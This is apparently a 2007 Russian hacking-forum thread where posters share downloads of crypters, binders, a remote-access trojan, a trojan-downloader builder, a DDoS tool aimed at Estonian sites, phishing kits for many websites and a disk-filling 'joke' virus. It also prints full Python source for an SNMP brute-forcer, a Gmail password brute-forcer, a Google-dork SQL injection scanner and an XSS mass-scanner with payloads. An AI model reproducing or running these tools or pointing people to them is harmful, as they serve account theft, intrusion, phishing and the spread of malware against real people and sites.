Features include the ability to remove cookies, the HTTP referer field, the HTTP user-agent field, scripts on the page, and objects, altering the user-agent string to whatever you please, and tunnelling your proxied traffic through a second proxy.
If there existed a freely public install of this script, two standard proxies could be used, one entered in the proxy settings of your browser, and one entered into the publicly installed web proxy, to create a connection being passed between three separate proxy servers before hitting the final destination.
Most web sites should be supported by this web proxy. AJAX applications might have problems with Surrogafier, but I would still like to know if an AJAX application is not working.
.
http://bcable.net/archive.php?surrogafier-1.0-rc3.php
Автор: Creeping Death 26.06.2007, 21:05
PS Crypter
http://rapidshare.com/files/39474720/PS_Crypter.rar
Scofield Cryptor 1.1 [Private]
http://rapidshare.com/files/39475372/Scofield_1.1.rar
Poison Ivy 2.3.0 [unpacked]
http://rapidshare.com/files/39476676/Poison_Ivy_2.3.0__unpacked_.rar
Автор: Creeping Death 27.06.2007, 15:24
Undetector By YaMaNe
http://rapidshare.com/files/39602002/UndetectorByYaMaNe.zip
Slh 4.0.1
http://rapidshare.com/files/39602334/Slh_4.0.1.rar
PHPBB RFI Scanner [Privat]
http://rapidshare.com/files/39533407/PHPBB_RFI_Scanner.rar
Автор: Creeping Death 28.06.2007, 00:39
Z-Dem0n 1.26
http://rapidshare.com/files/39716270/zdemon.zip
J Multi Binder 1.0
http://rapidshare.com/files/39715279/J_Multi_Binder_1.0.rar
Автор: Creeping Death 28.06.2007, 15:40
AntiDote v1.4
http://rapidshare.com/files/39832112/AntiDote_v1.4.rar
The Art Of Deception - Binder [New Stub]
http://rapidshare.com/files/39822101/The_Art_Of_Deception__New_Stub_.rar
Super Binder by "PrinceAli"
http://rapidshare.com/files/39819269/Super_Binder.rar
SkD Undetectabler Pro 2.0 - Crypter
http://rapidshare.com/files/39831559/SkD_Undetectabler_Pro_2.0.rar
Автор: Creeping Death 28.06.2007, 15:47
» Нажмите тут чтобы открыть/скрыть спойлер. «
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Автор: Creeping Death 28.06.2007, 16:08
Vulnerabilityes Scanners & Exploiters Pack v1.10
+Absinthe 1.3.1 Windows
+AnonFTP Anonymous Scanner
+Apache Scanner
+CGI Scanner
+DarkScanner 2.0
+FTP-IIS Fx Scanner
+HScan 1.20
+HTTP Server Detector
+ISS Internet Scanner v6.2.1
+JAAScoisX-Code RFI Code Exec Scanner
+N-Stealth Security Scanner v3.7 Built 67
+RFI T00l
+WebCheck
+Win32 x86 RFI Vuln Scanner
+X-Scan 3.3
+XSS LFI and File Discolure Scanner
+Zehir Exploit Scanner
+NetCat
+NMap 4.20
::Port Scanner::
+SuperScan 3.00
+SuperScan 4
::Other Tools::
+QuickSpoof
+PuTTy 0.60
http://rapidshare.com/files/39672244/Vulnscan.rar
Thx to iNs @ + D4RK-R3V-T34M +
Автор: Creeping Death 29.06.2007, 15:23
Themida v1.8.5.5
http://rapidshare.com/files/40014079/Themida_v1.8.5.5.rar
Yahoo!Messenger Monitor Sniffer v3.0
http://rapidshare.com/files/33957234/YahooMonitor.v3.0.rar
Ace Password Sniffer v1.3
The most powerful and effetive password sniffer. Ace Password Sniffer can listen on your LAN and enable network administrators or parents to capture passwords of any network user. Currently Ace Password Sniffer can monitor and capture passwords through FTP, POP3, HTTP, SMTP, Telnet, including some web mail password.
http://rapidshare.com/files/21376566/Ace_Password_Sniffer_V1.3.rar
SNMP Bruteforce
CODE
#!usr/bin/python
#Uses nmap to check if snmp port is open then uses snmpwalk to try and bruteforce
#the community name.
#Required: nmap and snmpwalk
#Changelog: added iprange, single scans and threading for random scans
#Changelog: added the ability to add your own wordlist, it will add to
#the ones given and erase the duplicates
#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com
import time, StringIO, commands, sys, re, threading, sets
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def title():
print "\n\t d3hydr8[at]gmail[dot]com snmpBruteForcer v1.2"
print "\t--------------------------------------------------\n"
def scan(option):
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+option+' -p 161 | grep open -B 3')[1]).read()
if re.search("command not found",nmap.lower()):
print "\n[-] nmap not installed!!!\n"
sys.exit(1)
else:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap)
if ipaddr:
return ipaddr
def brute(ip):
print "\n[+] Attempting BruteForce:",ip
try:
for n in names:
response = StringIO.StringIO(commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]).readlines()
if re.search("command not found",response[0].lower()):
print "\n[-] snmpwalk not installed!!!\n"
sys.exit(1)
else:
if verbose ==1:
print "\t{- Trying:",n
if len(response) > 1:
print "\n\tSuccess:",ip,"Community Name:",n
print "\n\tTry: snmpwalk",ip,n,"\n"
except(), msg:
#print "Error:",msg
pass
class Worker(threading.Thread):
def run(self):
ipaddr = scan("-iR 1")
if ipaddr != None:
for ip in ipaddr:
brute(ip)
if len(sys.argv) <= 2:
title()
print "Usage: ./snmp_random.py <option> \n"
print "Example: ./snmpbrute.py -iprange 192.168.1-100.1-255 -verbose\n"
print "[options]"
print " -s/single <ip>: Bruteforce single ip"
print " -i/-iprange <ip_range>: Scans ip range for snmp to brute force"
print " -r/-random <how many to scan>: Will scan random ip's for snmp to brute force"
print " -l/-list <wordlist file>: Add your own wordlist"
print " -v/-verbose : Verbose Mode\n"
sys.exit(1)
#Add more community names here.
names = ["1234","2read","4changes","CISCO","IBM","OrigEquipMfr","SNMP","SUN","access","admin","agent","all","cisco"
,"community","default","enable","field","guest","hello","ibm","manager","mngt","monitor","netman","network"
,"none","openview","pass","password","passwd","private","proxy","public","read","read-only","read-write"
,"root","router","secret","security","snmp","snmpd","solaris","sun","switch","system","tech","test"
,"world","write"]
for arg in sys.argv[1:]:
if arg.lower() == "-s" or arg.lower() == "-single":
ipaddr = sys.argv[int(sys.argv[1:].index(arg))+2]
mode = "Single IP"
if arg.lower() == "-i" or arg.lower() == "-iprange":
iprange = sys.argv[int(sys.argv[1:].index(arg))+2]
mode = "Ip-Range"
if arg.lower() == "-r" or arg.lower() == "-random":
total = sys.argv[int(sys.argv[1:].index(arg))+2]
mode = "Random"
if arg.lower() == "-l" or arg.lower() == "-list":
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
title()
try:
print "[+] Wordlist:",wordlist,"loading"
words = open(wordlist, "r").readlines()
print "[+] Loaded:",len(words),"names"
names = list(sets.Set(words+names))
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
except(NameError):
pass
print "[+] Mode:",mode
if mode == "Random":
if total.isdigit() == False:
print "\n[!] How many ips to scan: must be a number\n"
sys.exit(1)
else:
print "[+] Total:",total
if mode == "Ip-Range":
print "[+] Range:",iprange
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
print "[+] Names Loaded:",len(names)
print "[+] Started:",timer(),"\n"
if mode == "Random":
for i in range(int(total)):
print "[+] Scanning:",i+1,"of",total
work = Worker()
work.start()
time.sleep(1)
if mode == "Single IP":
brute(ipaddr)
if mode == "Ip-Range":
print "[+] Scanning:",iprange
ips = scan(iprange)
if ips != None:
print "[+] Found:",len(ips)
for ip in ips:
brute(ip)
else:
print "\n[!] No SNMP Open"
print "\n[-] Done -",timer(),"\n"
Автор: StuDY 24.07.2007, 15:06
OverSpy v2.5 + Key
Шпион захватывает все сетевые сеансы связи, посещенные вебсайты,
пароли, все электронные почты,- отправленные и полученные, все
напечатанные нажатия клавиши, все компьютерные операции и открытые
документы, берёт скриншоты каждые несколько минут и отправляет
сообщения вам по электронной почте...
Размер :3.8 Mb
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: bdrFsg 24.07.2007, 21:08
Blue's Port Scanner

http://www.bluebitter.de/download/BluesPortScan.zip
Gui-Version v5.0.2 Build #1265
http://www.bluebitter.de/download/CBPS.exeCommand line-Version v4.2 #272
Windows9x/ME/NT/2000/XP
A good port scanner is just one of the basic tools anyone who is
seriously interested in the internet needs.
The BluesPortScan is, i think, the fastest scanner for 32Bit windows which you can found in the net. It scans local 5000 ports in 8sec. on my 2k (P3-866) machine. If you are using Win9x/ME it's a little bit slower... The new version 5 has now features like Port list-scans, AutoCompletion when entering known, existing host names or ips and a big big list of typical port assignments. And of course, it's a little bit more stable, especially under Win9x/Me although these OSs are definitively not the operating systems of choice for the using this program.
Хороший порт-сканер що є однією з базових утіліт для кожного,хто справді зацікавлений в потребах Інтернету.
Я думаю,що це найшвидший сканер портів для 32-розрядних версій Windows,що ви зможете знайти в Інтернеті.Він сканує 5000 локальних портів за 8 секунд на моїй машині(2k (P3-866).Щоправда,якщо Ви використовуєте Win9x/MЕ,то це буде дещо повільніше...Нова,п'ята версія має зараз має такі можливості як сканування портів за певним списком,Автозавершення якщо введені відомі,існуючі імена хостів і справді великий список типових програм,що займають порти.І звичайно,ця версія дещо стабільніша,особливо під Win9x/Me,незважаючи на те що ці ОС безперечно не є тими операційними систеиами які є хорошим вибором для використання даної програми.
Рекомендую!
Автор: ter10n 25.07.2007, 01:13
Релизик от ZyklonTeam

DDoS Attacker
DDoS Attacker многопоточный, поддержка Socks 4, Socks 5.
Написан на Delphi

http://zyklonteam.org/
http://zyklonteam.org/files/ddosattacker.rar
пометка авторов: Special for attacking fuc*ing Estonian sites.
Автор: ter10n 31.07.2007, 01:33
Builder trojan downloader v1.2 beta public

Даунлоадер - загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере.
Принцип работы:
После запуска сливает файл с url-a и сохраняет на зараженый компьютер
в директорию заданную билдером (например в папку винды), и запускает ваш файл.
После запуска вашего файла удаляет свое тело.
Это публичная версия, толком не тестировал, используйте на свой страх и риск.
Релиз от: 04.07.07
Автор: os1r1s
http://secnull.info/
http://rapidshare.com/files/41019158/builder_tdw.rar
Автор: 666Player555 28.08.2007, 16:15
WebProxy
http://rapidshare.com/files/51749387/sh0x-webproxy.rar
PW: Sh0x
PHP MSN
http://rapidshare.com/files/51749150/sh0x-msn.rar
PW: Sh0x
Автор: StuDY 4.09.2007, 18:09
PayPal Bruteforcer ! v1.0b1
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: StuDY 6.09.2007, 14:10
DSJoiner v1.3 от Dr.Samuil
Бывшая приватная версия DSJoiner'a v1.3 от Dr.Samuil'a
Сорцы прилагаются, на момент паблик-релиза не палится ни одним антивирусом.
http://zyklonteam.org/files/DSJoiner13.rar
Автор: Creeping Death 9.09.2007, 19:54
Gmail BruteForce
CODE
#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./gmailpopbrute.py <userlist> <wordlist>\n"
sys.exit(1)
server = "pop.gmail.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\n[-] Reloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*30
print "[+] User:",user,"Password:",value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print "\t\t\n\nLogin successful:",user, value
print "\t\tMail:",pop.stat()[0],"emails"
print "\t\tSize:",pop.stat()[1],"bytes\n\n"
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print "\n\n[+] Login successful:",success[0], success[1]
print "\t[+] Mail:",success[2],"emails"
print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done\n"
Inguma (Pentesting Toolkit)Inguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits for many products.http://sourceforge.net/project/showfiles.php?group_id=188246&package_id=220086&release_id=486921
SQL Scanner v1.0CODE
#!/usr/bin/python
#SQL Scanner that will collect hosts using a google query. Will add the
#injection code to each hosts and search for md5 in the source.
#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, time, socket, httplib
def title():
print "\n\t d3hydr8[at]gmail[dot]com SQL Scanner v1.0"
print "\t-----------------------------------------------"
def usage():
title()
print "\n Usage: python SQLscan.py <options>\n"
print "\n Example: python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v\n"
print "\t[options]"
print "\t -g/-google <query> <num of hosts> : Searches google for hosts"
print "\t -s/-sql <file+injection code> : Vuln. file plux sql injection"
print "\t -w/-write <file> : Writes potential SQL found to file"
print "\t -v/-verbose : Verbose Mode\n"
def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def geturls(query):
counter = 10
urls = []
while counter < int(num):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls
def tester(victim):
if victim[:7] != "http://":
victim = "http://"+victim.rsplit("/",1)[0]+sql
if verbose ==1:
print "Testing:",victim
try:
source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
md5s = list(sets.Set(md5s))
print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:]
for md5 in md5s:
print "\t[",md5,"]\n"
found_sql.append(victim)
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass
if len(sys.argv) < 6:
usage()
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-s" or arg.lower() == "-sql":
sql = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-g" or arg.lower() == "-google":
query = sys.argv[int(sys.argv[1:].index(arg))+2]
num = sys.argv[int(sys.argv[1:].index(arg))+3]
title()
socket.setdefaulttimeout(10)
found_sql = []
count = 0
print "\n[+] SQL_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
if sql[:1] != "/":
sql = "/"+sql
print "[+] SQL:",sql
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
try:
if num.isdigit() == False:
print "\n[-] Argument [",num,"] must be a number.\n"
sys.exit(1)
else:
if int(num) <= 10:
print "\n[-] Argument [",num,"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",query)
print "[+] Query:",query
print "[+] Number:",num
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "[+] Scanning hosts..."
print "\n[-] Cancel: Press Ctrl-C"
for url in urls:
tester(url)
time.sleep(3)
print "-"*65
print "\n\n[+] Potential SQL found:",len(found_sql),"\n"
time.sleep(3)
if txt != None and len(found_sql) >=1:
sql_file = open(txt, "a")
sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n")
sql_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_sql:
count+=1
if txt != None:
sql_file.writelines("["+str(count)+"] "+k+"\n")
print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"
XSS Scanner ver 1.3CODE
#!/usr/bin/python
#XSS Scanner that can find hosts using a google query or search one site.
#If XSS is found it attempts to collect email addresses to further your attack
#or warn the target of the flaw. When the scan is complete
#it will print out the XSS's found and or write to file, it will find false positives
#so manually check before getting to excited. It also has verbose mode and
#you can change the alert pop-up message, check options!!
#
##Changelog v1.1: added options, verbose, write to file, change alert
#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback
#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)
#
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, httplib, time, socket
def title():
print "nt d3hydr8[at]gmail[dot]com XSS Scanner v1.3"
print "t-----------------------------------------------"
def usage():
title()
print "n Usage: python XSSscan.py <option>n"
print "n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -vn"
print "t[options]"
print "t -g/-google <query> <num of hosts> : Searches google for hosts"
print "t -s/-site <website> <port>: Searches just that site, (default port 80)"
print "t -a/-alert <alert message> : Change the alert pop-up message"
print "t -w/-write <file> : Writes potential XSS found to file"
print "t -v/-verbose : Verbose Moden"
def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def geturls(query):
counter = 10
urls = []
while counter < int(sys.argv[3]):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('w+.[w.-/]*.w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls
def getemails(site):
try:
if site.split("/",1)[0] not in done:
print "t[+] Collecting Emails:",site.split("/",1)[0]
webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read()
emails = re.findall('[w.-]+@[w.-]+.www', webpage)
done.append(site.split("/",1)[0])
if emails:
return emails
except(KeyboardInterrupt):
print "n[-] Cancelled -",timer(),"n"
sys.exit(1)
except(IndexError):
pass
def getvar(site):
names = []
actions = []
print "n","-"*45
print "[+] Searching:",site
try:
webpage = urllib2.urlopen(proto+"://"+site, port).read()
emails = re.findall('[w.-]+@[w.-]+.www', webpage)
var = re.findall("?[w.-/]*=",webpage)
if len(var) >=1:
var = list(sets.Set(var))
found_action = re.findall("action="[w.-/]*"", webpage.lower())
found_action = list(sets.Set(found_action))
if len(found_action) >= 1:
for a in found_action:
a = a.split('"',2)[1]
try:
if a[0] != "/":
a = "/"+a
except(IndexError):
pass
actions.append(a)
found_names = re.findall("name="[w.-/]*"", webpage.lower())
found_names = list(sets.Set(found_names))
for n in found_names:
names.append(n.split('"',2)[1])
print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*
len(xss_payloads)
if len(var) >= 1:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+"/"+v+xss)
for xss in xss_payloads:
tester(site+"/"+v+xss)
if len(names) >= 1:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss)
for xss in xss_payloads:
tester(site+"/"+"?"+n+"="+xss)
if len(actions) != 0 and len(names) >= 1:
for a in actions:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss)
#tester(site.split("/")[0]+a+"?"+n+"="+xss)
if len(actions) != 0 and len(var) >= 1:
for a in actions:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+a+v+xss)
else:
for xss in xss_payloads:
tester(site.split("/")[0]+a+v+xss)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror):
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
pass
except(KeyboardInterrupt):
print "n[-] Cancelled -",timer(),"n"
sys.exit(1)
def tester(target):
if verbose ==1:
if message != "":
print "Target:",target.replace(alert ,message)
else:
print "Target:",target
try:
source = urllib2.urlopen(proto+"://"+target, port).read()
h = httplib.HTTPConnection(target.split('/')[0], int(port))
try:
h.request("GET", "/"+target.split('/',1)[1])
except(IndexError):
h.request("GET", "/")
r1 = h.getresponse()
if verbose ==1:
print "t[+] Response:",r1.status, r1.reason
if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418):
if target not in found_xss:
if message != "":
print "n[!] XSS:", target.replace(alert ,message)
else:
print "n[!] XSS:", target
print "t[+] Response:",r1.status, r1.reason
emails = getemails(target)
if emails:
print "t[+] Email:",len(emails),"addressesn"
found_xss.setdefault(target, list(sets.Set(emails)))
else:
found_xss[target] = "None"
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
pass
except(KeyboardInterrupt):
print "n[-] Cancelled -",timer(),"n"
sys.exit(1)
except():
pass
if len(sys.argv) <= 2:
usage()
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-a" or arg.lower() == "-alert":
message = re.sub("s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])
title()
socket.setdefaulttimeout(3)
found_xss = {}
done = []
count = 0
proto = "http"
alert = "D3HYDR8%2D0wNz%2DY0U"
print "n[+] XSS_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
try:
if message:
print "[+] Alert:",message
except(NameError):
print "[+] Alert:",alert
message = ""
pass
xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E",
"%22%3E<IMG SRC="java script:alert(%27"+alert+"%27);">",
"%22%3E<script>alert(String.fromCharCode(68,51,72,89,68,82,56,45,48,119,78,122,45,89,48,85))
;</script>",
"'';!--"<%27"+alert+"%27>=&{()}",
"';alert(0)//';alert(1)//%22;alert(2)//%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function",
"</textarea><script>alert(%27"+alert+"%27)</script>"]
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
print "[+] XSS Payloads:",len(xss_payloads)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
try:
if sys.argv[3].isdigit() == False:
print "n[-] Argument [",sys.argv[3],"] must be a number.n"
sys.exit(1)
else:
if int(sys.argv[3]) <= 10:
print "n[-] Argument [",sys.argv[3],"] must be greater than 10.n"
sys.exit(1)
except(IndexError):
print "n[-] Need number of hosts to collect.n"
sys.exit(1)
query = re.sub("s","+",sys.argv[2])
port = "80"
print "[+] Query:",query
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "n[-] Cancel: Press Ctrl-C"
time.sleep(3)
while len(urls) > 0:
print "-"*45
print "n[-] Length:",len(urls),"remain"
getvar(random.choice(urls))
if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site":
site = sys.argv[2]
try:
if sys.argv[3].isdigit() == False:
port = "80"
else:
port = sys.argv[3]
except(IndexError):
port = "80"
print "[+] Site:",site
print "[+] Port:",port
if site[:7] == "http://":
site = site.replace("http://","")
if site[:8] == "https://":
proto = "https"
if port == "80":
print "[!] Using port 80 with https? (443)"
site = site.replace("https://","")
print "[+] Started:",timer()
print "n[-] Cancel: Press Ctrl-C"
time.sleep(4)
getvar(site)
print "-"*65
print "nn[+] Potential XSS found:",len(found_xss),"n"
time.sleep(3)
if txt != None and len(found_xss) >=1:
xss_file = open(txt, "a")
xss_file.writelines("ntd3hydr8[at]gmail[dot]com XSS Scanner v1.3n")
xss_file.writelines("t------------------------------------------nn")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_xss.keys():
count+=1
if txt != None:
if message != "":
xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"n")
else:
xss_file.writelines("["+str(count)+"] "+k+"n")
if message != "":
print "n["+str(count)+"]",k.replace(alert ,message)
else:
print "n["+str(count)+"]",k
addrs = found_xss[k]
if addrs != "None":
print "t[+] Email addresses:"
for addr in addrs:
if txt != None:
xss_file.writelines("tEmail: "+addr+"n")
print "t -",addr
print "n[-] Done -",timer(),"n"
SQL Injection Pentesting TooL--- [Added]
- Work with injection through GET,POST,GET(inside Cookie),POST(inside Cookie)
- Terminal for HTTP RAW (analogue of InetHack)
- Upload file to server through SQL
- Reading every available for reading file on the server:)
- BackConnect from DB = MsSQL
- Dump DB, if type of DB is MsSQL
- Possibility of a Basic authentication
- Possible Determine of the fields of a SELECT query using the ORDER BY,GROUP BY,UNION SELECT
- Possible replacements comments to analog when filtering
- Possible replacements spaces to analog when filtering
- Possibility of autodetection of KeyWord
- Possibility of autodetection of type DB
- Ability to connect to the servers at random port
- Ability to connect to the proxy-servers to a random port
--- [Fixed]
- A accurate definition of quantity the fields that supports printing values
- A accurate with proxy-servershttp://sqltool.itdefence.ru/setup.rar
Автор: Creeping Death 11.09.2007, 13:26
Root@Shell
http://www.w4ck1ng.com/Root_Shell.rar
Автор: Creeping Death 11.09.2007, 20:04
пошел фишинг...
Adult Friend Finder
Код
http://rapidshare.com/files/48422910/Adult_Friend_Finder.rar
AmazonКод
http://rapidshare.com/files/48422911/Amazon.rar
BeboКод
http://rapidshare.com/files/48422912/Bebo.rar
BreakКод
http://rapidshare.com/files/48422913/Break.rar
DeviantArtКод
http://rapidshare.com/files/48422914/DeviantArt.rar
FlickRКод
http://rapidshare.com/files/48422915/FlickR.rar
FreewebsКод
http://rapidshare.com/files/48422916/FreeWebs.rar
GeocitiesКод
http://rapidshare.com/files/48422917/GeoCities.rar
LiveJournalКод
http://rapidshare.com/files/48422918/LiveJournal.rar
Playstation UndergroundКод
http://rapidshare.com/files/48422919/Playstation_Underground.rar
PornoTubeКод
http://rapidshare.com/files/48422500/PornoTube.rar
SendSpaceКод
http://rapidshare.com/files/48422501/SendSpace.rar
SourceForgeКод
http://rapidshare.com/files/48422502/SourceForge.rar
TaggedКод
http://rapidshare.com/files/48422503/Tagged.rar
Tripod - LycosКод
http://rapidshare.com/files/48422504/Tripod_-_Lycos.rar
VeohКод
http://rapidshare.com/files/48422505/Veoh.rar
WWEКод
http://rapidshare.com/files/48422506/WWE.rar
XangaКод
http://rapidshare.com/files/48422507/Xanga.rar
XtubeКод
http://rapidshare.com/files/48422508/XTube.rar
Автор: Creeping Death 13.09.2007, 21:57
File Bomber
::Disguised as a RapidShare account hacker
::This creates a bunch of copies of
the "readme.txt"
SO the bigger the "readme.txt" file is
the more space it shall take up
::It creates a file on how to "uninstall"
Rapid H4xid
Because this is just a joke virus
(And as of now, i do not know how to remove)
(So do not run on your computer)
(the subdomain http://howtoremove.dave.hohs.net will be used for the removal)
-the "no remove" files do not have this
::Creates 100,000 copies of "readme.txt" which takes up
-195 GB
-200000 MB
-204800000 KB
-209715200000 Bytes
Of Space
::You can only close it
if you cancel the process
in task manager
::Adds to startup on
-Vista
-XP
-WinNT
-Win 9x
::Works on operating systems
-Windows
::Creates the files
but hidden! So they cant delete
the files. it will just take up a lot
of space with them not knowing
::The files are called
"PORNO MOVIE#(insert number here).mov
::I tested myself. It works
It creates about 2,0000+ files in 10 minutes
and doesnt stop til it reachers 100,000 files
::Hide from task manager
